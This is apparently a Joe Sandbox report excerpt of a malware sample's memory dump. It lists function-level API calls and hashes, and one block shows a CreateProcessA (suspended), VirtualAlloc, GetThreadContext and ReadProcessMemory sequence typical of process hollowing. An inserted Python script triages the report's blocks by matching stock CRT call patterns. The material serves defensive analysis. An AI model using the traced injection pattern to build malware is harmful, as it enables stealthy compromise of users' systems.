                                                                                                        Similarity
                                                                                                        • API ID: Time$System$FileLocalSpecific
                                                                                                        • String ID:
                                                                                                        • API String ID: 1707611234-0
                                                                                                        • Opcode ID: ff165a1b026abf800ea81e02941ef03e20dc1b4a5ba4ead3e831a8f9d9c6f27b
                                                                                                        • Instruction ID: 60356c707d031126fb495060b40f2fea8ebf79a0925a22ebc0bacb1017a65c2d
                                                                                                        • Opcode Fuzzy Hash: ff165a1b026abf800ea81e02941ef03e20dc1b4a5ba4ead3e831a8f9d9c6f27b
                                                                                                        • Instruction Fuzzy Hash: B111D67290020CEFCF10DF95D989EDF77BCAB08310F544266E616E6191EA38EA45CBA1

                                                                                                        Control-flow Graph
                                                                                                        • Basic blocks 76b250-76b4b5 (rendered graph omitted). Entry block calls GetComputerNameExW; subcalls: 78adc0 (twice), 7853d0, 782d00, 7626a0, 78ea38, 789d26, 7896b0.
                                                                                                        APIs
                                                                                                        • GetComputerNameExW.KERNEL32(00000002,?,?,3F07E9DB,74DF0F00), ref: 0076B2A6
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000E.00000002.3580786588.0000000000761000.00000020.00000001.01000000.00000000.sdmp, Offset: 00760000, based on PE: true
                                                                                                        • Associated: 0000000E.00000002.3580749069.0000000000760000.00000002.00000001.01000000.00000000.sdmp
                                                                                                        • Associated: 0000000E.00000002.3580870957.00000000007B0000.00000002.00000001.01000000.00000000.sdmp
                                                                                                        • Associated: 0000000E.00000002.3580915251.00000000007C5000.00000004.00000001.01000000.00000000.sdmp
                                                                                                        • Associated: 0000000E.00000002.3580952355.00000000007CC000.00000002.00000001.01000000.00000000.sdmp
                                                                                                        • Associated: 0000000E.00000002.3581004685.00000000007D2000.00000008.00000001.01000000.00000000.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_14_2_760000_explorer.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: ComputerName
                                                                                                        • String ID:
                                                                                                        • API String ID: 3545744682-0
                                                                                                        • Opcode ID: ce8ca879f83932c4413636ad3e2807dbea4fde8bc35f240872e2c28e1b4f70f8
                                                                                                        • Instruction ID: 474b6e49deac9c242d0529005e5259a8b4af02f2d6b7ae7c76e997f486b85136
                                                                                                        • Opcode Fuzzy Hash: ce8ca879f83932c4413636ad3e2807dbea4fde8bc35f240872e2c28e1b4f70f8
                                                                                                        • Instruction Fuzzy Hash: 8F518071A012289BCB20EF64DC887DDBBB4EB59310F5002D9D81AE7651DB78AAC4CF91

                                                                                                        Control-flow Graph
                                                                                                        • Basic blocks 799b8f-799c09 (rendered graph omitted). Subcalls: 79a21a, 7984a9, 797c06.
                                                                                                        APIs
                                                                                                          • Part of subcall function 0079A21A: RtlAllocateHeap.NTDLL(00000008,?,00000000,?,007969C2,00000001,00000364,00000006,000000FF,?,?,00789ABF,007808E7,?,007830BE,8B18EC84), ref: 0079A25B
                                                                                                        • _free.LIBCMT ref: 00799BFE
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000E.00000002.3580786588.0000000000761000.00000020.00000001.01000000.00000000.sdmp, Offset: 00760000, based on PE: true
                                                                                                        • Associated: 0000000E.00000002.3580749069.0000000000760000.00000002.00000001.01000000.00000000.sdmp
                                                                                                        • Associated: 0000000E.00000002.3580870957.00000000007B0000.00000002.00000001.01000000.00000000.sdmp
                                                                                                        • Associated: 0000000E.00000002.3580915251.00000000007C5000.00000004.00000001.01000000.00000000.sdmp
                                                                                                        • Associated: 0000000E.00000002.3580952355.00000000007CC000.00000002.00000001.01000000.00000000.sdmp
                                                                                                        • Associated: 0000000E.00000002.3581004685.00000000007D2000.00000008.00000001.01000000.00000000.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_14_2_760000_explorer.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: AllocateHeap_free
                                                                                                        • String ID:
                                                                                                        • API String ID: 614378929-0
APIs
Memory Dump Source
• Source File: 0000000E.00000002.3580786588.0000000000761000.00000020.00000001.01000000.00000000.sdmp, Offset: 00760000, based on PE: true
Similarity
• API ID: _free
• String ID:
• API String ID: 269201875-0
APIs
• RtlAllocateHeap.NTDLL(00000008,?,00000000,?,007969C2,00000001,00000364,00000006,000000FF,?,?,00789ABF,007808E7,?,007830BE,8B18EC84), ref: 0079A25B
Memory Dump Source
• Source File: 0000000E.00000002.3580786588.0000000000761000.00000020.00000001.01000000.00000000.sdmp, Offset: 00760000, based on PE: true
Similarity
• API ID: AllocateHeap
• String ID:
• API String ID: 1279760036-0
APIs
  • Part of subcall function 007661F0: RegOpenKeyExA.KERNELBASE(?,?,00000000,00000001,3F07E9DB,3F07E9DB), ref: 0076639C
  • Part of subcall function 007661F0: RegQueryValueExA.KERNELBASE(3F07E9DB,?,00000000,00000000,?,00000400,?,?,00000000,00000001,3F07E9DB,3F07E9DB), ref: 007663CA
  • Part of subcall function 007661F0: RegCloseKey.KERNELBASE(3F07E9DB,?,?,00000000,00000001,3F07E9DB,3F07E9DB), ref: 007663D6
• Sleep.KERNELBASE ref: 00780925
Memory Dump Source
• Source File: 0000000E.00000002.3580786588.0000000000761000.00000020.00000001.01000000.00000000.sdmp, Offset: 00760000, based on PE: true
Similarity
• API ID: CloseOpenQuerySleepValue
• String ID:
• API String ID: 4119054056-0
APIs
  • Part of subcall function 007661F0: RegOpenKeyExA.KERNELBASE(?,?,00000000,00000001,3F07E9DB,3F07E9DB), ref: 0076639C
  • Part of subcall function 007661F0: RegQueryValueExA.KERNELBASE(3F07E9DB,?,00000000,00000000,?,00000400,?,?,00000000,00000001,3F07E9DB,3F07E9DB), ref: 007663CA
  • Part of subcall function 007661F0: RegCloseKey.KERNELBASE(3F07E9DB,?,?,00000000,00000001,3F07E9DB,3F07E9DB), ref: 007663D6
• Sleep.KERNELBASE ref: 007809B5
Memory Dump Source
• Source File: 0000000E.00000002.3580786588.0000000000761000.00000020.00000001.01000000.00000000.sdmp, Offset: 00760000, based on PE: true
Similarity
• API ID: CloseOpenQuerySleepValue
• String ID:
• API String ID: 4119054056-0
APIs
  • Part of subcall function 007661F0: RegOpenKeyExA.KERNELBASE(?,?,00000000,00000001,3F07E9DB,3F07E9DB), ref: 0076639C
  • Part of subcall function 007661F0: RegQueryValueExA.KERNELBASE(3F07E9DB,?,00000000,00000000,?,00000400,?,?,00000000,00000001,3F07E9DB,3F07E9DB), ref: 007663CA
  • Part of subcall function 007661F0: RegCloseKey.KERNELBASE(3F07E9DB,?,?,00000000,00000001,3F07E9DB,3F07E9DB), ref: 007663D6
• Sleep.KERNELBASE ref: 00780A45
Memory Dump Source
• Source File: 0000000E.00000002.3580786588.0000000000761000.00000020.00000001.01000000.00000000.sdmp, Offset: 00760000, based on PE: true
Similarity
• API ID: CloseOpenQuerySleepValue
• String ID:
• API String ID: 4119054056-0
Strings
Memory Dump Source
• Source File: 0000000E.00000002.3581004685.00000000007D2000.00000008.00000001.01000000.00000000.sdmp, Offset: 00760000, based on PE: true
Similarity
• API ID:
• String ID: $ $($($($($($($($8$8$8$>$`$g$g$g$g$z$z$z
• API String ID: 0-3464496334
APIs
  • Part of subcall function 00791803: GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,00767EE2,00000000,3F07E9DB), ref: 00791816
  • Part of subcall function 00791803: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00791847
• GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 0076809D
• CreateProcessA.KERNEL32(?,00000000,00000000,00000000,00000000,00000004,00000000,00000000,?,?), ref: 007680FB
• VirtualAlloc.KERNEL32(00000000,00000004,00001000,00000004), ref: 00768114
• GetThreadContext.KERNEL32(?,00000000), ref: 00768129
• ReadProcessMemory.KERNEL32(?, ,?,00000004,00000000), ref: 00768149
Strings
Memory Dump Source
• Source File: 0000000E.00000002.3580786588.0000000000761000.00000020.00000001.01000000.00000000.sdmp, Offset: 00760000, based on PE: true
Similarity
• API ID: FileProcessTime$AllocContextCreateMemoryModuleNameReadSystemThreadUnothrow_t@std@@@Virtual__ehfuncinfo$??2@
• String ID: $VUUU$invalid stoi argument
• API String ID: 3815659930-3954507777
APIs
  • Part of subcall function 00796820: GetLastError.KERNEL32(00000000,00000000,?,00797607,?,00000000,00000000,?,00797AC1,00000000,00000000,00000000,00000000,8B18EC83,007C3208,00000010), ref: 00796825
  • Part of subcall function 00796820: SetLastError.KERNEL32(00000000,00000006,000000FF,?,00797AC1,00000000,00000000,00000000,00000000,8B18EC83,007C3208,00000010,00790B22,00000000,00000000,00000000), ref: 007968C3
• GetACP.KERNEL32(?,?,?,?,?,?,00794C29,?,?,?,00000055,?,-00000050,?,?,00000004), ref: 007A1C89
• IsValidCodePage.KERNEL32(00000000,?,?,?,?,?,?,00794C29,?,?,?,00000055,?,-00000050,?,?), ref: 007A1CB4
• _wcschr.LIBVCRUNTIME ref: 007A1D48
• _wcschr.LIBVCRUNTIME ref: 007A1D56
• GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,-00000050,00000000,000000D0), ref: 007A1E17
Strings
Memory Dump Source
• Source File: 0000000E.00000002.3580786588.0000000000761000.00000020.00000001.01000000.00000000.sdmp, Offset: 00760000, based on PE: true
Similarity
• API ID: ErrorLast_wcschr$CodeInfoLocalePageValid
• String ID: <Y{$utf8
• API String ID: 4147378913-1075160420
                                                                                                        • Opcode ID: 69d9a59fdeb5ca5109b6fc94fe13b1cb923ea79b6f6561c370aba8f2e7a53267
                                                                                                        • Instruction ID: 2b6dcac3dae080734fbda4a4801e9c4345f7cbdf32cf3de3ac47ade782fbfada
                                                                                                        • Opcode Fuzzy Hash: 69d9a59fdeb5ca5109b6fc94fe13b1cb923ea79b6f6561c370aba8f2e7a53267
                                                                                                        • Instruction Fuzzy Hash: FF712831A40606EAFB24EB34CC4ABBB73A8EFCA750F544269F505DB181FA7CD8008761
                                                                                                        APIs
                                                                                                          • Part of subcall function 00796820: GetLastError.KERNEL32(00000000,00000000,?,00797607,?,00000000,00000000,?,00797AC1,00000000,00000000,00000000,00000000,8B18EC83,007C3208,00000010), ref: 00796825
                                                                                                          • Part of subcall function 00796820: SetLastError.KERNEL32(00000000,00000006,000000FF,?,00797AC1,00000000,00000000,00000000,00000000,8B18EC83,007C3208,00000010,00790B22,00000000,00000000,00000000), ref: 007968C3
                                                                                                          • Part of subcall function 00796820: _free.LIBCMT ref: 00796882
                                                                                                          • Part of subcall function 00796820: _free.LIBCMT ref: 007968B8
                                                                                                        • GetUserDefaultLCID.KERNEL32(?,?,?,00000055,?), ref: 007A2635
                                                                                                        • IsValidCodePage.KERNEL32(00000000), ref: 007A267E
                                                                                                        • IsValidLocale.KERNEL32(?,00000001), ref: 007A268D
                                                                                                        • GetLocaleInfoW.KERNEL32(?,00001001,-00000050,00000040,?,000000D0,00000055,00000000,?,?,00000055,00000000), ref: 007A26D5
                                                                                                        • GetLocaleInfoW.KERNEL32(?,00001002,00000030,00000040), ref: 007A26F4
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000E.00000002.3580786588.0000000000761000.00000020.00000001.01000000.00000000.sdmp, Offset: 00760000, based on PE: true
                                                                                                        • Associated: 0000000E.00000002.3580749069.0000000000760000.00000002.00000001.01000000.00000000.sdmp
                                                                                                        • Associated: 0000000E.00000002.3580870957.00000000007B0000.00000002.00000001.01000000.00000000.sdmp
                                                                                                        • Associated: 0000000E.00000002.3580915251.00000000007C5000.00000004.00000001.01000000.00000000.sdmp
                                                                                                        • Associated: 0000000E.00000002.3580952355.00000000007CC000.00000002.00000001.01000000.00000000.sdmp
                                                                                                        • Associated: 0000000E.00000002.3581004685.00000000007D2000.00000008.00000001.01000000.00000000.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_14_2_760000_explorer.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Locale$ErrorInfoLastValid_free$CodeDefaultPageUser
                                                                                                        • String ID: <Y{
                                                                                                        • API String ID: 949163717-2124319567
                                                                                                        • Opcode ID: 35dcafa2a2a23731f409a753cba281c6a864d7dbba03680d1a100970c3fa3dac
                                                                                                        • Instruction ID: 0ce9c11f5e03bd03da4582535ba273d850e3cce06a0385ced6170c368076d989
                                                                                                        • Opcode Fuzzy Hash: 35dcafa2a2a23731f409a753cba281c6a864d7dbba03680d1a100970c3fa3dac
                                                                                                        • Instruction Fuzzy Hash: 5B519171A01209AFDF10DFA9DC45FBE77B8BF8A700F044269E904EB192E7789905CB61
                                                                                                        APIs
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000E.00000002.3580786588.0000000000761000.00000020.00000001.01000000.00000000.sdmp, Offset: 00760000, based on PE: true
                                                                                                        • Associated: 0000000E.00000002.3580749069.0000000000760000.00000002.00000001.01000000.00000000.sdmp
                                                                                                        • Associated: 0000000E.00000002.3580870957.00000000007B0000.00000002.00000001.01000000.00000000.sdmp
                                                                                                        • Associated: 0000000E.00000002.3580915251.00000000007C5000.00000004.00000001.01000000.00000000.sdmp
                                                                                                        • Associated: 0000000E.00000002.3580952355.00000000007CC000.00000002.00000001.01000000.00000000.sdmp
                                                                                                        • Associated: 0000000E.00000002.3581004685.00000000007D2000.00000008.00000001.01000000.00000000.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_14_2_760000_explorer.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: __floor_pentium4
                                                                                                        • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                                                                                                        • API String ID: 4168288129-2761157908
                                                                                                        • Opcode ID: cd89b731d7df3fbe0e7008cc78d0241aaf09c91161342a67188e9f50347ac92b
                                                                                                        • Instruction ID: 15b00e7752d6d0c9103e0001a91eb0d70dc2b3cfde7065cbf9673a018459b28d
                                                                                                        • Opcode Fuzzy Hash: cd89b731d7df3fbe0e7008cc78d0241aaf09c91161342a67188e9f50347ac92b
                                                                                                        • Instruction Fuzzy Hash: 51D23B71E086298FDB65CE28DC407EAB7B5EBC6305F1446EAD40DE7240E779AE818F41
                                                                                                        APIs
                                                                                                        • GetLocaleInfoW.KERNEL32(?,2000000B,007A2672,00000002,00000000,?,?,?,007A2672,?,00000000), ref: 007A23ED
                                                                                                        • GetLocaleInfoW.KERNEL32(?,20001004,007A2672,00000002,00000000,?,?,?,007A2672,?,00000000), ref: 007A2416
                                                                                                        • GetACP.KERNEL32(?,?,007A2672,?,00000000), ref: 007A242B
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000E.00000002.3580786588.0000000000761000.00000020.00000001.01000000.00000000.sdmp, Offset: 00760000, based on PE: true
                                                                                                        • Associated: 0000000E.00000002.3580749069.0000000000760000.00000002.00000001.01000000.00000000.sdmp
                                                                                                        • Associated: 0000000E.00000002.3580870957.00000000007B0000.00000002.00000001.01000000.00000000.sdmp
                                                                                                        • Associated: 0000000E.00000002.3580915251.00000000007C5000.00000004.00000001.01000000.00000000.sdmp
                                                                                                        • Associated: 0000000E.00000002.3580952355.00000000007CC000.00000002.00000001.01000000.00000000.sdmp
                                                                                                        • Associated: 0000000E.00000002.3581004685.00000000007D2000.00000008.00000001.01000000.00000000.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_14_2_760000_explorer.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: InfoLocale
                                                                                                        • String ID: ACP$OCP
                                                                                                        • API String ID: 2299586839-711371036
                                                                                                        • Opcode ID: c77d499cc4ac847cd704864dfbb4eef2e294a9e9232a7edb406d94df2ab2ff14
                                                                                                        • Instruction ID: aa19ac0f52299b0ec3ae207b3a63d12ac48446f5bedebc3c70d3d174cfb91e40
                                                                                                        • Opcode Fuzzy Hash: c77d499cc4ac847cd704864dfbb4eef2e294a9e9232a7edb406d94df2ab2ff14
                                                                                                        • Instruction Fuzzy Hash: 8E21B322604105AADF348F1DC904B9B73A6EFDBB50B568664E90ADB216E73EDD83C350
                                                                                                        APIs
                                                                                                        • IsProcessorFeaturePresent.KERNEL32(00000017), ref: 0078A1A1
                                                                                                        • IsDebuggerPresent.KERNEL32 ref: 0078A26D
                                                                                                        • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0078A28D
                                                                                                        • UnhandledExceptionFilter.KERNEL32(?), ref: 0078A297
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000E.00000002.3580786588.0000000000761000.00000020.00000001.01000000.00000000.sdmp, Offset: 00760000, based on PE: true
                                                                                                        • Associated: 0000000E.00000002.3580749069.0000000000760000.00000002.00000001.01000000.00000000.sdmp
                                                                                                        • Associated: 0000000E.00000002.3580870957.00000000007B0000.00000002.00000001.01000000.00000000.sdmp
                                                                                                        • Associated: 0000000E.00000002.3580915251.00000000007C5000.00000004.00000001.01000000.00000000.sdmp
                                                                                                        • Associated: 0000000E.00000002.3580952355.00000000007CC000.00000002.00000001.01000000.00000000.sdmp
                                                                                                        • Associated: 0000000E.00000002.3581004685.00000000007D2000.00000008.00000001.01000000.00000000.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_14_2_760000_explorer.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
                                                                                                        • String ID:
                                                                                                        • API String ID: 254469556-0
                                                                                                        • Opcode ID: 35e4ce973056058ae03ba33ede719555c7d6200801ac2e4e4ebbb3239b6421ca
                                                                                                        • Instruction ID: e245ca791f76a3c52c1cb3d14f0ad096e719265927d04c13053227c38857faf4
                                                                                                        • Opcode Fuzzy Hash: 35e4ce973056058ae03ba33ede719555c7d6200801ac2e4e4ebbb3239b6421ca
                                                                                                        • Instruction Fuzzy Hash: 66311875D4121CDBDF20EFA4D989BCDBBB8BF08304F1041AAE40DAB250EB755A898F45
                                                                                                        APIs
                                                                                                          • Part of subcall function 00796820: GetLastError.KERNEL32(00000000,00000000,?,00797607,?,00000000,00000000,?,00797AC1,00000000,00000000,00000000,00000000,8B18EC83,007C3208,00000010), ref: 00796825
                                                                                                          • Part of subcall function 00796820: SetLastError.KERNEL32(00000000,00000006,000000FF,?,00797AC1,00000000,00000000,00000000,00000000,8B18EC83,007C3208,00000010,00790B22,00000000,00000000,00000000), ref: 007968C3
                                                                                                          • Part of subcall function 00796820: _free.LIBCMT ref: 00796882
                                                                                                          • Part of subcall function 00796820: _free.LIBCMT ref: 007968B8
                                                                                                        • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 007A202F
                                                                                                        • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 007A2079
                                                                                                        • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 007A213F
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000E.00000002.3580786588.0000000000761000.00000020.00000001.01000000.00000000.sdmp, Offset: 00760000, based on PE: true
                                                                                                        • Associated: 0000000E.00000002.3580749069.0000000000760000.00000002.00000001.01000000.00000000.sdmp
                                                                                                        • Associated: 0000000E.00000002.3580870957.00000000007B0000.00000002.00000001.01000000.00000000.sdmp
                                                                                                        • Associated: 0000000E.00000002.3580915251.00000000007C5000.00000004.00000001.01000000.00000000.sdmp
                                                                                                        • Associated: 0000000E.00000002.3580952355.00000000007CC000.00000002.00000001.01000000.00000000.sdmp
                                                                                                        • Associated: 0000000E.00000002.3581004685.00000000007D2000.00000008.00000001.01000000.00000000.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_14_2_760000_explorer.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: InfoLocale$ErrorLast_free
                                                                                                        • String ID:
                                                                                                        • API String ID: 3140898709-0
                                                                                                        • Opcode ID: 1d0fa1fc7993aa347d6f67136e86e0ab1bfaace157d1b7ab8e9ec4278fecb471
                                                                                                        • Instruction ID: 26256d0b4e1a4b4a0f4d47e3a347a075d9f043c61cb134e340c577165b14d797
                                                                                                        • Opcode Fuzzy Hash: 1d0fa1fc7993aa347d6f67136e86e0ab1bfaace157d1b7ab8e9ec4278fecb471
                                                                                                        • Instruction Fuzzy Hash: F561807165011B9FDB289F2CCC86BBA77A9FF96300F104269E915C6186EB3CDD82DB50
                                                                                                        APIs
                                                                                                        • IsDebuggerPresent.KERNEL32(?,?,?,?,?,?), ref: 0078E974
                                                                                                        • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,?), ref: 0078E97E
                                                                                                        • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,?), ref: 0078E98B
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000E.00000002.3580786588.0000000000761000.00000020.00000001.01000000.00000000.sdmp, Offset: 00760000, based on PE: true
                                                                                                        • Associated: 0000000E.00000002.3580749069.0000000000760000.00000002.00000001.01000000.00000000.sdmp
                                                                                                        • Associated: 0000000E.00000002.3580870957.00000000007B0000.00000002.00000001.01000000.00000000.sdmp
                                                                                                        • Associated: 0000000E.00000002.3580915251.00000000007C5000.00000004.00000001.01000000.00000000.sdmp
                                                                                                        • Associated: 0000000E.00000002.3580952355.00000000007CC000.00000002.00000001.01000000.00000000.sdmp
                                                                                                        • Associated: 0000000E.00000002.3581004685.00000000007D2000.00000008.00000001.01000000.00000000.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_14_2_760000_explorer.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                                                        • String ID:
                                                                                                        • API String ID: 3906539128-0
                                                                                                        • Opcode ID: aa2bc52d15446a3e2250977936e96a6df4e189dea29a070b3933db21bc167327
                                                                                                        • Instruction ID: 0486378225bc8d0436a7aff227d79021234fb0198a93659dac55c4b586966129
                                                                                                        • Opcode Fuzzy Hash: aa2bc52d15446a3e2250977936e96a6df4e189dea29a070b3933db21bc167327
                                                                                                        • Instruction Fuzzy Hash: 7231D67494121CDBCB21EF65DC89BCDBBB8BF08310F5041DAE40CA6260E7749B858F45
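The two function blocks above that call IsDebuggerPresent (refs 0078A26D and 0078E974) call it together with SetUnhandledExceptionFilter(00000000) and UnhandledExceptionFilter, and the first one additionally probes IsProcessorFeaturePresent(00000017), i.e. PF_FASTFAIL_AVAILABLE. That call sequence is consistent with the MSVC CRT's own failure-reporting code (the stack-cookie handler __report_gsfailure and the fault-reporting helper it shares with the invalid-parameter path), where the debugger check only decides whether the process is terminated after the exception filter runs. The GetUserDefaultLCID/IsValidCodePage/IsValidLocale/GetLocaleInfoW blocks are likewise consistent with CRT setlocale internals. The script below is an added example and not part of the Joe Sandbox report: it parses the report's "APIs" lines, separates a function's own calls from "Part of subcall function" entries, and tags blocks whose call pattern matches those CRT routines so that a lone IsDebuggerPresent is not weighted as sample-specific anti-debugging. The verdict labels, the LOCALE_APIS allow-list and the regexes are my own assumptions; the sample input reproduces two of the report's blocks, trimmed to the fields the parser uses.

```python
"""Triage helper for the per-function blocks a Joe Sandbox report prints (added example,
not code from the report): parse "APIs" lines and tag stock MSVC CRT call patterns."""
import re
from dataclasses import dataclass, field
from typing import Optional

# Two blocks reproduced from the report (refs 0078A1A1.. and 007A2635..), trimmed.
SAMPLE = """\
APIs
• IsProcessorFeaturePresent.KERNEL32(00000017), ref: 0078A1A1
• IsDebuggerPresent.KERNEL32 ref: 0078A26D
• SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0078A28D
• UnhandledExceptionFilter.KERNEL32(?), ref: 0078A297
• API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
• Instruction Fuzzy Hash: 66311875D4121CDBDF20EFA4D989BCDBBB8BF08304F1041AAE40DAB250EB755A898F45
APIs
  • Part of subcall function 00796820: GetLastError.KERNEL32(00000000,00000000,?,00797607), ref: 00796825
• GetUserDefaultLCID.KERNEL32(?,?,?,00000055,?), ref: 007A2635
• IsValidCodePage.KERNEL32(00000000), ref: 007A267E
• IsValidLocale.KERNEL32(?,00000001), ref: 007A268D
• GetLocaleInfoW.KERNEL32(?,00001001,-00000050,00000040), ref: 007A26D5
• API ID: Locale$ErrorInfoLastValid_free$CodeDefaultPageUser
• Instruction Fuzzy Hash: 5B519171A01209AFDF10DFA9DC45FBE77B8BF8A700F044269E904EB192E7789905CB61
"""

PF_FASTFAIL_AVAILABLE = 0x17   # feature __report_gsfailure probes before using __fastfail
# Allow-list (my own choice) of APIs the CRT setlocale/_expandlocale internals call.
LOCALE_APIS = {"GetLocaleInfoW", "GetUserDefaultLCID", "IsValidCodePage", "IsValidLocale",
               "GetACP", "GetOEMCP", "GetCPInfo", "EnumSystemLocalesW",
               "GetLastError", "SetLastError", "_free"}

API_RE = re.compile(r"^\s*•\s+(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+):\s+)?"
                    r"(?P<name>[A-Za-z_]\w*)\.(?P<mod>[A-Za-z_]\w*)"
                    r"(?:\((?P<args>[^)]*)\))?,?\s+ref:\s+(?P<ref>[0-9A-Fa-f]+)")
FIELD_RE = re.compile(r"^\s*•\s+(?P<key>[^:]+):\s*(?P<val>.*)$")

@dataclass
class ApiCall:
    name: str
    mod: str
    args: list                     # raw tokens as printed: "00000017", "?", "-00000050"
    ref: str
    subcall: Optional[str] = None  # set when the call lives in a callee ("Part of subcall")

    def arg_int(self, i: int) -> Optional[int]:
        """Argument i as an int, or None when absent or unresolved ('?')."""
        tok = self.args[i].strip() if i < len(self.args) else "?"
        return None if tok in ("", "?") else int(tok, 16)

@dataclass
class FuncBlock:
    calls: list = field(default_factory=list)
    fields: dict = field(default_factory=dict)

    def direct(self):              # calls made by this function itself, not by callees
        return [c for c in self.calls if c.subcall is None]

    def api_names(self):
        return {c.name for c in self.direct()}

def parse_blocks(text: str) -> list:
    """Split report text into FuncBlocks; an 'Instruction Fuzzy Hash' line closes a block."""
    blocks, cur = [], FuncBlock()
    for line in text.splitlines():
        m = API_RE.match(line)
        if m:
            args = m.group("args")
            cur.calls.append(ApiCall(m.group("name"), m.group("mod"),
                                     args.split(",") if args is not None else [],
                                     m.group("ref"), m.group("sub")))
            continue
        f = FIELD_RE.match(line)
        if f:
            key = f.group("key").strip()
            cur.fields[key] = f.group("val").strip()
            if key == "Instruction Fuzzy Hash":
                blocks.append(cur)
                cur = FuncBlock()
    if cur.calls or cur.fields:
        blocks.append(cur)
    return blocks

def classify(block: FuncBlock) -> str:
    """Verdict labels are my own; each names the CRT routine the call pattern matches."""
    names = block.api_names()
    if not names:
        return "no_direct_api_calls"
    # CRT fault path: IsDebuggerPresent only decides whether TerminateProcess follows
    # the UnhandledExceptionFilter call; it is not an evasion check.
    if {"IsDebuggerPresent", "SetUnhandledExceptionFilter", "UnhandledExceptionFilter"} <= names:
        calls = block.direct()
        if any(c.name == "SetUnhandledExceptionFilter" and c.arg_int(0) == 0 for c in calls):
            if any(c.name == "IsProcessorFeaturePresent"
                   and c.arg_int(0) == PF_FASTFAIL_AVAILABLE for c in calls):
                return "crt_gs_failure_report"      # __report_gsfailure + its reporting helper
            return "crt_fault_report"               # e.g. the invalid-parameter fault report
    if names <= LOCALE_APIS:
        return "crt_locale_init"
    if "IsDebuggerPresent" in names:
        return "review_debugger_check"              # debugger probe outside the CRT pattern
    return "review"

if __name__ == "__main__":
    for b in parse_blocks(SAMPLE):
        print(f"{classify(b):24s} {b.fields.get('API ID', ''):55s} {', '.join(sorted(b.api_names()))}")
```

Feed it the whole IDA-plugin section of a report and review only the blocks that come back as review or review_debugger_check; a block tagged crt_gs_failure_report that also carries an unexpected API ID is still worth a look, since the allow-lists are deliberately narrow.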
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000E.00000002.3580786588.0000000000761000.00000020.00000001.01000000.00000000.sdmp, Offset: 00760000, based on PE: true
                                                                                                        • Associated: 0000000E.00000002.3580749069.0000000000760000.00000002.00000001.01000000.00000000.sdmp
                                                                                                        • Associated: 0000000E.00000002.3580870957.00000000007B0000.00000002.00000001.01000000.00000000.sdmp
                                                                                                        • Associated: 0000000E.00000002.3580915251.00000000007C5000.00000004.00000001.01000000.00000000.sdmp
                                                                                                        • Associated: 0000000E.00000002.3580952355.00000000007CC000.00000002.00000001.01000000.00000000.sdmp
                                                                                                        • Associated: 0000000E.00000002.3581004685.00000000007D2000.00000008.00000001.01000000.00000000.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_14_2_760000_explorer.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 1124f90cfe80d4467dedb1b18eba1de972a06b90169947a1a845ad02c99f095e
                                                                                                        • Instruction ID: 57cdec4a0a194fbc46f616ebb65f314ade63188b002f4004415e795fe8f878d0
                                                                                                        • Opcode Fuzzy Hash: 1124f90cfe80d4467dedb1b18eba1de972a06b90169947a1a845ad02c99f095e
                                                                                                        • Instruction Fuzzy Hash: 54F15F71E01219AFDF14DFA8D8806ADB7F1FF89314F258269D819AB345D735AE02CB90
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000E.00000002.3580786588.0000000000761000.00000020.00000001.01000000.00000000.sdmp, Offset: 00760000, based on PE: true
                                                                                                        • Associated: 0000000E.00000002.3580749069.0000000000760000.00000002.00000001.01000000.00000000.sdmp
                                                                                                        • Associated: 0000000E.00000002.3580870957.00000000007B0000.00000002.00000001.01000000.00000000.sdmp
                                                                                                        • Associated: 0000000E.00000002.3580915251.00000000007C5000.00000004.00000001.01000000.00000000.sdmp
                                                                                                        • Associated: 0000000E.00000002.3580952355.00000000007CC000.00000002.00000001.01000000.00000000.sdmp
